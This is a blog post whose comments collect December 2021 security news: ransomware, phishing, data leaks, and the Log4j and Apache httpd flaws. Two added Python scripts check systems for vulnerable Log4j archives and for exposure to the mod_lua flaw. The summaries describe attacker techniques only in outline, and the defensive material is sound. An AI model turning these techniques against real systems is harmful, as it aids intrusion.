Cyber Security News December 2021

This posting is here to collect cyber security news in December 2021.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

435 Comments

  1. Tomi Engdahl says:

    Dridex Omicron phishing taunts with funeral helpline number https://www.bleepingcomputer.com/news/security/dridex-omicron-phishing-taunts-with-funeral-helpline-number/
    Over the past few weeks, one of the Dridex phishing email distributors is having fun toying with victims and researchers. In a new phishing campaign discovered by MalwareHunterTeam and 604Kuzushi, this same threat actor took it to the next level by spamming emails with a subject of “COVID-19 testing result” that states the recipient was exposed to a coworker who tested positive to the Omicron COVID-19 variant.

  2. Tomi Engdahl says:

    AvosLocker ransomware reboots in Safe Mode to bypass security tools https://www.bleepingcomputer.com/news/security/avoslocker-ransomware-reboots-in-safe-mode-to-bypass-security-tools/
    In recent attacks, the AvosLocker ransomware gang has started focusing on disabling endpoint security solutions that stand in their way by rebooting compromised systems into Windows Safe Mode. This tactic makes it easier to encrypt victims’ files since most security solutions will be automatically disabled after Windows devices boot in Safe Mode.

  3. Tomi Engdahl says:

    How I found the Grafana zero-day Path Traversal exploit that gave me access to your logs https://labs.detectify.com/2021/12/15/zero-day-path-traversal-grafana/
    On December 2, open-source analytics solution Grafana released an emergency security patch for critical zero-day Path Traversal vulnerability CVE-2021-43798, after proof-of-concept code to exploit the issue was published online. The flaw, which received a 7.5 CVSS score enabling remote access to local files, is no longer exploitable on servers that have the latest Grafana update.

  4. Tomi Engdahl says:

    Example of how attackers are trying to push crypto miners via Log4Shell https://isc.sans.edu/forums/diary/Example+of+how+attackers+are+trying+to+push+crypto+miners+via+Log4Shell/28172/
    While following Log4Shell’s exploit attempts hitting our honeypots, I came across another campaign trying to push a crypto miner on the victim’s machines. The previous campaign I analyzed used a simple post-exploitation Powershell script to download and launch the coin miner xmrig. The new one uses a .Net launcher to download, decrypt, and execute the binaries.

  5. Tomi Engdahl says:

    Personal and salary data for 637,138 Albanian citizens leaks online https://therecord.media/personal-and-salary-data-for-637138-albanian-citizens-leaks-online/
    The Albanian government has confirmed and apologized on Thursday for a data leak that exposed the personal and salary-related information for 637,138 citizens, more than 22% of the country’s entire population.
    Details such as names, ID card numbers, salaries, job positions, and employer names were shared over the weekend on WhatsApp as an Excel document.

  6. Tomi Engdahl says:

    Hack DHS’ bug bounty program expands to Log4j security flaws https://www.bleepingcomputer.com/news/security/hack-dhs-bug-bounty-program-expands-to-log4j-security-flaws/
    The Department of Homeland Security (DHS) has announced that the ‘Hack DHS’ program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities. The ‘Hack DHS’ bug bounty program was announced last week. It allows vetted cybersecurity researchers to find and report vulnerabilities in external DHS systems, earning rewards of up to $5,000 per reported bug.

    CrowdStrike Launches Free Targeted Log4j Search Tool https://www.crowdstrike.com/blog/free-targeted-log4j-search-tool/
    The CrowdStrike Services team has been busy developing a community tool that can be used to quickly scan file systems looking for versions of the Log4j code libraries to help organizations understand what they need to patch in order to mitigate their risk. The free CrowdStrike tool (dubbed the CrowdStrike Archive Scan Tool, or “CAST”) performs a targeted search by scanning a given set of directories for JAR, WAR, ZIP and EAR files, and then it performs a deeper scan on those file types matching against a known set of checksums for Log4j libraries. We help organizations find any version of the affected Log4j library anywhere on disk, even if it is deeply nested in multiple levels of archive files.

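A recursive archive scanner in the spirit of the CAST approach described in the CrowdStrike post above, added here as an illustration (it is not CrowdStrike's code or the CAST tool): it walks a directory for JAR/WAR/EAR/ZIP files, descends into nested archives in memory, and flags members whose SHA-256 is in a known-bad set, or a jar that still carries JndiLookup.class. The checksum set and the sample EAR/WAR/jar nesting are constructed for the demo; a real deployment would load the published checksums of affected Log4j releases.

```python
"""Recursive Log4j archive scanner (illustrative, not the CAST tool).

Walks a directory tree for JAR/WAR/EAR/ZIP files, descends into nested archives
in memory, and reports members whose SHA-256 is in a known-bad set, or any jar
that still contains JndiLookup.class (the class removed by the Log4j 2.16 mitigation).
"""
import hashlib
import io
import os
import tempfile
import zipfile
from typing import Iterator, List, Set, Tuple

ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MAX_MEMBER_BYTES = 200 * 1024 * 1024   # guard against decompression bombs
MAX_DEPTH = 8                          # guard against pathological nesting


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def walk_archive(data: bytes, path: str, depth: int = 0) -> Iterator[Tuple[str, str, bytes]]:
    """Yield (virtual_path, member_name, member_bytes) for every file in the
    archive, recursing into members that are themselves archives."""
    if depth > MAX_DEPTH:
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip-based archive (or corrupted); nothing to descend into
    with zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            member = zf.read(info)
            vpath = f"{path}!{info.filename}"
            yield vpath, info.filename, member
            if info.filename.lower().endswith(ARCHIVE_EXTS):
                yield from walk_archive(member, vpath, depth + 1)


def scan_bytes(data: bytes, path: str, bad_hashes: Set[str]) -> List[Tuple[str, str, str]]:
    """Return (virtual_path, reason, sha256) findings for one on-disk archive."""
    findings = []
    top = sha256(data)
    if top in bad_hashes:
        findings.append((path, "checksum-match", top))
    for vpath, name, member in walk_archive(data, path):
        digest = sha256(member)
        if digest in bad_hashes:
            findings.append((vpath, "checksum-match", digest))
        elif name.endswith(JNDI_LOOKUP):
            # Unknown build of log4j-core, but the JNDI lookup class is still present.
            findings.append((vpath, "jndilookup-present", digest))
    return findings


def scan_tree(root: str, bad_hashes: Set[str]) -> List[Tuple[str, str, str]]:
    """Scan every JAR/WAR/EAR/ZIP below root, including nested archives."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    findings.extend(scan_bytes(fh.read(), full, bad_hashes))
    return findings


def build_sample_tree(root: str) -> str:
    """CONSTRUCTED demo input: app.ear > app.war > WEB-INF/lib/log4j-core-2.14.1.jar
    containing a fake JndiLookup.class. Returns the SHA-256 of the inner jar so the
    caller can treat it as a 'known-bad' checksum."""
    def make_zip(members: dict) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
            for name, blob in members.items():
                z.writestr(name, blob)
        return buf.getvalue()

    inner_jar = make_zip({
        JNDI_LOOKUP: b"\xca\xfe\xba\xbe constructed placeholder class bytes",
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    })
    war = make_zip({"WEB-INF/lib/log4j-core-2.14.1.jar": inner_jar})
    ear = make_zip({"app.war": war})
    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "app.ear"), "wb") as fh:
        fh.write(ear)
    return sha256(inner_jar)


def demo() -> Tuple[str, List[Tuple[str, str, str]]]:
    """Build the constructed sample in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = build_sample_tree(tmp)
        findings = scan_tree(tmp, {bad})
    return bad, findings


if __name__ == "__main__":
    for vpath, reason, digest in demo()[1]:
        print(f"{reason:20} {digest[:16]}  {vpath}")
```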
  7. Tomi Engdahl says:

    Steam Has Reportedly Been Banned In China
    By Stacey Henley, published 2 days ago
    Chinese players are reporting that Steam has been blacklisted.
    https://www.thegamer.com/steam-banned-china-christmas-day/

    Update 25/12/21 14:07 GMT: Some conflicting reports claim this is the result of a DNS attack and not a deliberate ban. We will update this story as we know more.

  8. Tomi Engdahl says:

    Just released v2.0 of LogMePwn — a fully automated #Log4j scanner with custom payloads, CIDR range scanning & multi-protocol support for HTTP, SSH, FTP, IMAP and many more. Check out the updated release!

    https://github.com/0xInfection/LogMePwn

  9. Tomi Engdahl says:

    QNAP NAS devices hit in surge of ech0raix ransomware attacks https://www.bleepingcomputer.com/news/security/qnap-nas-devices-hit-in-surge-of-ech0raix-ransomware-attacks/
    Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt. The jump in the number of attacks is confirmed by the ID ransomware service, where submissions started to increase on December 19 and subsided towards December 26.

  10. Tomi Engdahl says:

    More than 1,200 phishing toolkits capable of intercepting 2FA detected in the wild https://therecord.media/more-than-1200-phishing-toolkits-capable-of-intercepting-2fa-detected-in-the-wild/
    A team of academics said it found more than 1,200 phishing toolkits deployed in the wild that are capable of intercepting and allowing cybercriminals to bypass two-factor authentication (2FA) security codes. To counter this new trend in account security protections, since at least 2017, threat actors started adopting new tools that would allow them to bypass 2FA by stealing a user’s authentication cookies, which are files created inside a web browser once the user has logged into an account after the 2FA process was completed.

  11. Tomi Engdahl says:

    Shutterfly services disrupted by Conti ransomware attack https://www.bleepingcomputer.com/news/security/shutterfly-services-disrupted-by-conti-ransomware-attack/
    Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data. On Friday, a source told BleepingComputer that Shutterfly suffered a ransomware attack approximately two weeks ago by the Conti gang, who claims to have encrypted over 4,000 devices and 120 VMware ESXi servers. While BleepingComputer has not seen the negotiations for the attack, we are told that they are underway in progress and that the ransomware gang is demanding millions of dollars as a ransom.

  12. Tomi Engdahl says:

    Global Cyberattacks from Nation-State Actors Posing Greater Threats https://threatpost.com/global-cyberattacks-nation-state-threats/177253/
    Casey Ellis, CTO at Bugcrowd, outlines how international relations have deteriorated into a new sort of Cold War, with espionage playing out in the cyber-domain.

  13. Tomi Engdahl says:

    Ransomware Evolution: From WannaCry to DarkSide
    https://medium.com/technology-hits/ransomware-evolution-from-wannacry-to-darkside-1dab07c4d890
    2021 is coming to an end. And for cybersecurity, this is a busy year (which wasn’t?). Ransomware attacks are steep upward, and the gradient isn’t softening its progression. Individuals and organizations continue to fall victim to this age-old cybercrime and it’s far from a new phenomenon. If you are not new to the industry, you should remember that the last peak of attention on this issue was in 2017, when the infamous WannaCry ransomware devastated companies. However, comparing what we are facing this year with those in 2017, we saw a giant leap in the business model and the malware themselves.

  14. Tomi Engdahl says:

    Ransomware Spotlight: REvil
    https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
    Now that the reign of REvil has come to an end, it’s time to regroup and strategize. What can organizations learn from REvil’s tactics? We review the rise, downfall, and future of its operations using insights into the group’s arsenal and inner workings. REvil, also known as Sodinokibi, had risen to notoriety for its high-profile attacks since its discovery in 2019. After being among the most active ransomware variants in 2021, it was officially shut down after garnering the attention of law enforcement agencies due to its attacks on critical industries that resulted in supply shortages and delays. The crackdown led to the arrest of two of its associates and its TOR network being taken offline. However, organizations should not let their guard down.
    We foresee the group reemerging under a new moniker with the REvil name now tarnished and unlikely to entice affiliates.

  15. Tomi Engdahl says:

    What does a cyber analyst do during a cyberattack? Take part in an open cyber exercise and find out!
    https://www.epressi.com/tiedotteet/tietoturva/mita-kyberanalyytikko-tekee-kyberhyokkayksen-aikana-osallistu-avoimeen-kyberharjoitukseen-ja-kokeile.html
    The Europe-wide Flagship 2 cyber exercise of Jyväskylä University of Applied Sciences (Jamk) will also be run as an open exercise, in which anyone interested in cyber security can step into the role of a cyber analyst in the middle of a simulated cyberattack. Jyväskylä University of Applied Sciences is organizing a cyber security exercise in January, with participants expected from 22 European countries. The participants’ task is to find signs of threat activity and technically investigate the cyberattack that has taken place, as well as to consider its impact on the organization’s core operations. For the first time, people outside the project are also able to take part in the exercise.

  16. Tomi Engdahl says:

    Asset Visibility Maps Relationships and Communication Pathways in OT Environments https://www.dragos.com/blog/industry-news/asset-visibility-maps-relationships-and-communication-pathways-in-ot-environments/
    Experienced cybersecurity professionals will tell you that you can’t secure the systems you don’t know about, which is why asset visibility is so crucial no matter what kind of technology infrastructure you’re defending. Asset visibility in industrial control system (ICS) environments provides industrial asset owners and operators and security staff with the knowledge and insight necessary to build a mature operational technology (OT) cybersecurity program. When organizations can get accurate and timely views into the assets running on their industrial networks, the benefits are cascading.

  17. Tomi Engdahl says:

    In 2022, security will be Linux and open-source developers job number one https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
    Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.

  18. Tomi Engdahl says:

    Critical Apache HTTPD Server Bugs Could Lead to RCE, DoS
    https://threatpost.com/apache-httpd-server-bugs-rce-dos/177234/

    Don’t freak: It’s got nothing to do with Log4Shell, except it may be just as far-reaching as Log4j, given HTTPD’s tendency to tiptoe into software projects.
    Don’t duck at the latest mention of Apache: Two critical bugs in its HTTP web server – HTTPD – need to be patched pronto, lest they lead to attackers triggering denial of service (DoS) or bypassing your security policies.
    Both vulnerabilities are found in Apache HTTP Server 2.4.51 and earlier.
    The first issue (CVE-2021-44790) is with the function “r:parsebody” of the component “mod_lua Multipart Parser.” As the VulDB vulnerability database describes it, “manipulation with an unknown input leads to a memory-corruption vulnerability” that “is going to have an impact on confidentiality, integrity and availability.”

    VulDB also noted that the issue is reportedly easy to exploit: “It is possible to launch the attack remotely. The exploitation doesn’t require any form of authentication.”
    In a Tuesday writeup of the two CVEs, Sophos principal security researcher Paul Ducklin said that the two bugs could leave servers at risk of some serious hurt.
    “These bugs might not be exposed in your configuration, because they are part of optional run-time modules that you might not actually be using,” Ducklin noted. “But if you are using these modules, whether you realize it or not, you could be at risk of server crashes, data leakage or even remote code execution.”

    On Monday, Apache published these details for the two CVEs in its changelog:

    CVE-2021-44790: Possible buffer overflow when parsing a carefully crafted request in the mod_lua multipart parser of Apache HTTP Server 2.4.51 and earlier. Apache said that its HTTPD team hasn’t seen an exploit, but “it might be possible to craft one.”
    CVE-2021-44224: Possible NULL dereference or Server Side Request Forgery (SSRF) in forward proxy configurations, likewise in Apache HTTP Server 2.4.51 and earlier.

    Sean Nikkel, senior cyber-threat intel analyst at Digital Shadows, noted that a quick peek at the Shodan search engine reveals that there are more than 3 million public devices running some version of HTTPD as of this writing, meaning there’s a chance that HTTPD is running on some internal or otherwise non-public instances.
    Schless urged IT teams to address the CVEs immediately, prioritizing anything that’s publicly accessible or web-facing. “These assets are the ones that attackers will scan for in order to find vulnerable systems and exploit the vulnerability,” he said.

    After that, security teams should then move on to assessing and addressing internal servers and applications to which only employees have access, he added.

  19. Tomi Engdahl says:

    High-Risk Flaw Haunts Apache Server
    https://www.securityweek.com/high-risk-flaw-haunts-apache-server

    The Apache Software Foundation has released a new version of its flagship web server to patch a pair of security defects, one serious enough to lead to remote code execution attacks.

    The Apache HTTP Server 2.4.52 is listed as urgent and the U.S. government’s security response agency CISA is calling on users of the open-source cross-platform web server software to “update as soon as possible.”

    The patch provides cover for two documented security vulnerabilities — CVE-2021-44790 and CVE-2021-44224 — one of which may allow a remote attacker to take control of an affected system.

    From the Apache Software Foundation advisory:

    HIGH: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51 and earlier (CVE-2021-44790)

    A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).

    The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one.

    The open-source group also documented CVE-2021-44224, a “moderate-risk” NULL dereference or SSRF in forward proxy configurations in Apache HTTP Server 2.4.51 and earlier.

  20. Tomi Engdahl says:

    IT Services Firm Inetum Discloses Ransomware Attack
    https://www.securityweek.com/it-services-firm-inetum-discloses-ransomware-attack

    French IT services company Inetum Group revealed just before Christmas that it had fallen victim to a ransomware attack, but claimed that impact on its operations was limited.

    Inetum, which operates in 26 countries and has roughly 27,000 employees worldwide, said the attack took place on December 19. The company said it acted quickly, isolating the affected “operational sites,” including networks and services.

    https://www.inetum.com/en/press/cyberattack-inetum-france

  21. Tomi Engdahl says:

    Jackson Public Schools Ups Cybersecurity After Hacker Attack
    https://www.securityweek.com/jackson-public-schools-ups-cybersecurity-after-hacker-attack

    The public school district in Mississippi’s capital city is implementing new cybersecurity measures after hackers attacked its server last year.

  22. Tomi Engdahl says:

    Organizations Targeted With Babuk-Based Rook Ransomware
    https://www.securityweek.com/organizations-targeted-babuk-based-rook-ransomware

    A piece of ransomware that emerged in late November has already made three victims, with the first of them hit less than a week after the malware was initially spotted.

    Dubbed Rook, the ransomware shows numerous similarities with Babuk, and security researchers have discovered that it was in fact built using Babuk code that was leaked online earlier this year.

    Rook was initially seen on VirusTotal on November 26, and its first victim – a Kazakh financial institution – was identified on November 30. In addition to encrypting the organization’s files, the Rook gang stole roughly 1 terabyte of data, to use it for extortion.

  23. Tomi Engdahl says:

    New Flaws Expose EVlink Electric Vehicle Charging Stations to Remote Hacking
    https://www.securityweek.com/new-flaws-expose-evlink-electric-vehicle-charging-stations-remote-hacking

    Schneider Electric has patched several new vulnerabilities that expose its EVlink electric vehicle charging stations to remote hacker attacks.

    Schneider announced the availability of patches on December 14, when it urged customers to immediately apply patches or mitigations. The flaws have been found to impact EVlink City (EVC1S22P4 and EVC1S7P4), Parking (EVW2, EVF2 and EVP2PE) and Smart Wallbox (EVB1A) devices, as well as some products that have reached end of life.

    The vendor has credited researcher Tony Nasr for finding a total of seven vulnerabilities in these charging stations, including one critical and five high-severity issues.

    The security holes include cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs that can be exploited to carry out actions on behalf of a legitimate user, and a weakness that can be leveraged to gain access to a charging station’s web interface via brute-force attacks. The most serious issue — based on its CVSS score of 9.3 — is a server-side request forgery (SSRF) vulnerability.

  24. Tomi Engdahl says:

    Albanian Prime Minister Apologizes Over Database Leak
    https://www.securityweek.com/albanian-prime-minister-apologizes-over-database-leak

    Albania’s prime minister on Thursday apologized for a big leak of personal records from a government database of state and private employees, which he said seems more like an inside job than a cyber attack.

    A file containing the personal identity card numbers, employment and salary data of some 637,000 people became public this week and was widely shared through messaging apps.

    Prime Minister Edi Rama said the leak is being investigated.

    “According to a preliminary analysis, it looks more like an internal infiltration rather than an outside … cyber-attack,” Rama told a press conference.

  25. Tomi Engdahl says:

    NVIDIA, HPE Products Affected by Log4j Vulnerabilities
    https://www.securityweek.com/nvidia-hpe-products-affected-log4j-vulnerabilities

    NVIDIA and Hewlett Packard Enterprise (HPE) have confirmed that some of their products are affected by the recently disclosed vulnerabilities in the Apache Log4j logging utility.

    A total of three vulnerabilities were identified in the utility – namely CVE-2021-44228 (aka Log4Shell), CVE-2021-45046 and CVE-2021-45105 – and at least two of them have been exploited in malicious attacks.

    Shortly after the issues became public, NVIDIA and HPE started investigating which of their products are affected, and both of them already released patches and mitigations to resolve the bugs or prevent potential exploitation attempts.

    In an advisory updated on Wednesday, NVIDIA confirmed that the Log4j security defects affect CUDA Toolkit Visual Profiler and Nsight Eclipse Edition, NetQ, and vGPU Software License Server.

    Security Notice: NVIDIA Response to Log4j Vulnerabilities – December 2021
    https://nvidia.custhelp.com/app/answers/detail/a_id/5294

    HPE, on the other hand, says that some of its products are also affected by CVE-2021-4104, a deserialization of untrusted data vulnerability that can be triggered by an attacker with access to the Log4j configuration and which results in remote code execution (only Log4j 1.2 configured to use JMSAppender is affected).

    The company has identified roughly 60 products that use the vulnerable library and has already published security notices (including patches and mitigations) and security bulletins for them.

    HPESBGN04215 rev.8 – Certain HPE Products using Apache Log4j, Remote Arbitrary Code Execution, Remote Code Execution, and Remote Denial of Service
    https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04215en_us

  26. Tomi Engdahl says:

    Several Critical Vulnerabilities Found in myPRO HMI/SCADA Product
    https://www.securityweek.com/several-critical-vulnerabilities-found-mypro-hmiscada-product

    A researcher has found a dozen vulnerabilities in the myPRO product of Czech industrial automation company mySCADA, including several flaws that have been assigned a critical severity rating.

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued two advisories to inform organizations about these vulnerabilities — one advisory was released in August and one on December 21.

    The researcher who discovered the security holes, Michael Heinzl, has also made available advisories describing each issue.

    https://awesec.com/advisories.html

  27. Tomi Engdahl says:

    Microsoft Office Patch Bypassed for Malware Distribution in Apparent ‘Dry Run’
    https://www.securityweek.com/microsoft-office-patch-bypassed-malware-distribution-apparent-dry-run

    Cybercriminals have found a way to bypass the patch for a recent Microsoft Office vulnerability and leveraged it to briefly distribute Formbook malware, Sophos reports.

    Tracked as CVE-2021-40444 (CVSS score of 8.8), and affecting the MSHTML file format, the security defect can be exploited to achieve remote code execution on vulnerable systems. An attacker looking to exploit the bug needs to trick the intended victim into opening a maliciously crafted document.

    Publicly disclosed on September 7, after attacks exploiting it were identified, the security error was addressed with the September 2021 Patch Tuesday updates. Proof-of-concept code targeting the bug was also published and exploitation activity intensified.

  28. Tomi Engdahl says:

    Five Eyes Nations Issue Joint Guidance on Log4j Vulnerabilities
    https://www.securityweek.com/five-eyes-nations-issue-joint-guidance-log4j-vulnerabilities

    Government agencies in the United States, Canada, the United Kingdom, Australia and New Zealand on Wednesday announced the release of a joint cybersecurity advisory to provide guidance on addressing the recently disclosed vulnerabilities affecting the widely used Log4j logging utility.

    Governments around the world have been warning organizations about the risks posed by the recent Log4j vulnerabilities, at least two of which — CVE-2021-44228 (aka Log4Shell) and CVE-2021-45046 — have been exploited in attacks.

    Both cybercriminals and state-sponsored threat actors have targeted Log4j in their recent attacks, but the Belgian military appears to be the only government organization that has confirmed being hit to date.

  29. Tomi Engdahl says:

    400,000 Individuals Affected by Email Breach at West Virginia Healthcare Company
    https://www.securityweek.com/400000-individuals-affected-email-breach-west-virginia-healthcare-company

    Monongalia Health System (Mon Health) this week disclosed a business email compromise (BEC) incident that was the result of unauthorized access to its email system.

    Mon Health says it became aware of the intrusion on July 28, when a vendor notified it of a payment that had not come through. An investigation launched into the matter revealed that adversaries likely had unauthorized access to the email system between May 10 and August 15, 2021.

    As part of the incident, cybercriminals compromised a Mon Health contractor’s email account and used it to send messages in an attempt to obtain funds through fraudulent wire transfers.

  30. Tomi Engdahl says:

    LastPass master passwords may have been compromised
    https://appleinsider.com/articles/21/12/28/lastpass-master-passwords-may-have-been-compromised

    LastPass members have reported multiple attempted logins using correct master passwords from various locations, but the company says that the recent attacks are a result of shared passwords gleaned from breaches of other services.

    Multiple users in a Hacker News forum have shared that their master passwords for LastPass appear to be compromised. It is unknown how the passwords have leaked out, but a pattern has emerged amongst users.

    The majority of reports appear to come from users with outdated LastPass accounts, meaning they haven’t used the service in some time and haven’t changed the password. This indicates the master password list being used may have come from an earlier hack.

    “LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted ‘credential stuffing’ activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services,”

    We can confirm that there is some kind of organized effort to break into LastPass vaults. Since publication, we’ve had confirmation from readers and colleagues all over the globe about login attempts.

    AppleInsider recommends that users change their passwords, enable two-factor authentication, and keep an eye out for suspicious login attempts. There is also the option of removing passwords from the service and migrating to 1Password or Apple’s iCloud Keychain.

    LastPass is a free password manager available across desktop and mobile devices.

  31. Tomi Engdahl says:

    Cyberattack on one of Norway’s largest media companies shuts down presses
    https://therecord.media/cyberattack-on-one-of-norways-largest-media-companies-shuts-down-presses/
    Amedia, the largest local news publisher in Norway, announced on Tuesday that several of its central computer systems were shut down in what it is calling an apparent “serious” cyberattack. The attack is preventing the company from printing Wednesday’s edition of physical newspapers, and presses will continue to be halted until the issue is resolved, Amedia executive vice president of technology Pål Nedregotten said in a statement. The company said it is unclear whether personal information has been compromised; the subscription system affected by the attack contains names, addresses, phone numbers, and subscription history of customers. Data such as passwords, read history, and financial information are not affected, the company said.

  32. Tomi Engdahl says:

    Log4j 2.17.1 out now, fixes new remote code execution bug
    https://www.bleepingcomputer.com/news/security/log4j-2171-out-now-fixes-new-remote-code-execution-bug/
    Apache has released another Log4j version, 2.17.1, fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Rated ‘Moderate’ in severity and assigned a 6.6 score on the CVSS scale, the vulnerability stems from the lack of additional controls on JNDI access in log4j. “Related to CVE-2021-44832 where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.”

  33. Tomi Engdahl says:

    New Flagpro malware linked to Chinese state-backed hackers
    https://www.bleepingcomputer.com/news/security/new-flagpro-malware-linked-to-chinese-state-backed-hackers/
    BlackTech cyber-espionage APT (advanced persistent threat) group has been spotted targeting Japanese companies using novel malware that researchers call ‘Flagpro’. The threat actor uses Flagpro in the initial stage of an attack for network reconnaissance, to evaluate the target’s environment, and to download second-stage malware and execute it.

  34. Tomi Engdahl says:

    LastPass users warned their master passwords are compromised
    https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
    Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations. The email notifications also mention that the login attempts have been blocked because they were made from unfamiliar locations worldwide.

  35. Tomi Engdahl says:

    RedLine malware shows why passwords shouldn’t be saved in browsers
    https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/
    The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea. This malware is a commodity information-stealer that can be purchased for roughly $200 on cyber-crime forums and be deployed without requiring much knowledge or effort. In an example presented by the analysts, a remote employee lost VPN account credentials to RedLine Stealer actors who used the information to hack the company’s network three months later.

  36. Tomi Engdahl says:

    Shutterfly Says Ransomware Attack Impacted Manufacturing
    https://www.securityweek.com/shutterfly-says-ransomware-attack-impacted-manufacturing

    Shutterfly, an online platform for photography and personalized products, has confirmed that some of its services have been affected by a ransomware attack.

    Operating multiple services and brands – such as BorrowLenses, GrooveBook, Lifetouch, Shutterfly, Snapfish, Spoonflower, and Tiny Prints – the online retail and manufacturing platform helps users create products such as cards, gifts, home décor, invitations, photo books, and more.

    The recent ransomware attack, the company told SecurityWeek in an emailed statement, impacted parts of its network, including manufacturing and corporate systems.

    Reply
  37. Tomi Engdahl says:

    High-Risk Flaw Haunts Apache Server
    https://www.securityweek.com/high-risk-flaw-haunts-apache-server

    The Apache Software Foundation has released a new version of its flagship web server to patch a pair of security defects, one serious enough to lead to remote code execution attacks.

    The Apache HTTP Server 2.4.52 is listed as urgent and the U.S. government’s security response agency CISA is calling on users of the open-source cross-platform web server software to “update as soon as possible.”

    The patch provides cover for two documented security vulnerabilities — CVE-2021-44790 and CVE-2021-44224 — one of which may allow a remote attacker to take control of an affected system.

    From the Apache Software Foundation advisory:

    HIGH: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51 and earlier (CVE-2021-44790)

    A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).

    The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one.

    Reply
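A quick exposure check for the mod_lua issue quoted above, written as an added example (not code from the ASF advisory or the SecurityWeek article): it parses the output of `httpd -v` and `httpd -M`, and reports a host as exposed to CVE-2021-44790 only when the version is below 2.4.52 and `lua_module` is actually loaded. The captured outputs in the block are constructed for the example; the `mod_lua_exposure` function and its result keys are this example's own naming.

```python
"""Exposure check for CVE-2021-44790 from `httpd -v` / `httpd -M` output.

Added example; not from the ASF advisory or SecurityWeek. The captured
command outputs below are constructed for illustration.
"""
import re

FIXED = (2, 4, 52)  # first Apache httpd release carrying the fix


def parse_version(httpd_v):
    """Extract (major, minor, patch) from `httpd -v` output."""
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", httpd_v)
    if not m:
        raise ValueError("no Apache version string found")
    return tuple(int(x) for x in m.groups())


def loaded_modules(httpd_M):
    """Module names from `httpd -M`, whose lines read 'name (shared|static)'."""
    return {
        m.group(1)
        for m in re.finditer(r"^\s*(\w+)\s+\((?:shared|static)\)", httpd_M, re.M)
    }


def mod_lua_exposure(httpd_v, httpd_M):
    """Decide whether this build is exposed to the mod_lua overflow.

    'patched' is the pure version test (also relevant to CVE-2021-44224);
    'exposed' additionally requires mod_lua to be loaded, since the bug
    lives in that module's multipart parser.
    """
    version = parse_version(httpd_v)
    has_lua = "lua_module" in loaded_modules(httpd_M)
    return {
        "version": version,
        "patched": version >= FIXED,
        "mod_lua": has_lua,
        "exposed": version < FIXED and has_lua,
    }


# Constructed sample output from a pre-patch build with mod_lua enabled.
SAMPLE_V = "Server version: Apache/2.4.51 (Unix)\nServer built:   Oct  7 2021 16:27:04\n"
SAMPLE_M = (
    "Loaded Modules:\n"
    " core_module (static)\n"
    " so_module (static)\n"
    " http_module (static)\n"
    " lua_module (shared)\n"
    " dir_module (shared)\n"
)

if __name__ == "__main__":
    print(mod_lua_exposure(SAMPLE_V, SAMPLE_M))
```

Two caveats when using this: distribution packages (Debian, RHEL and derivatives) backport fixes without bumping the upstream version string, so a "2.4.51" from a distro build may already be patched and the package changelog is the authority; and a loaded mod_lua is necessary but not sufficient, because the advisory ties the overflow to Lua scripts that call `r:parsebody()`, so the Lua handlers actually deployed decide whether the parser is reachable.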
  38. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    Some LastPass users say their master passwords were compromised and used in blocked login attempts from unknown IPs; LastPass blames “credential stuffing” — Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried …
    LastPass users warned their master passwords are compromised
    https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/

    Reply
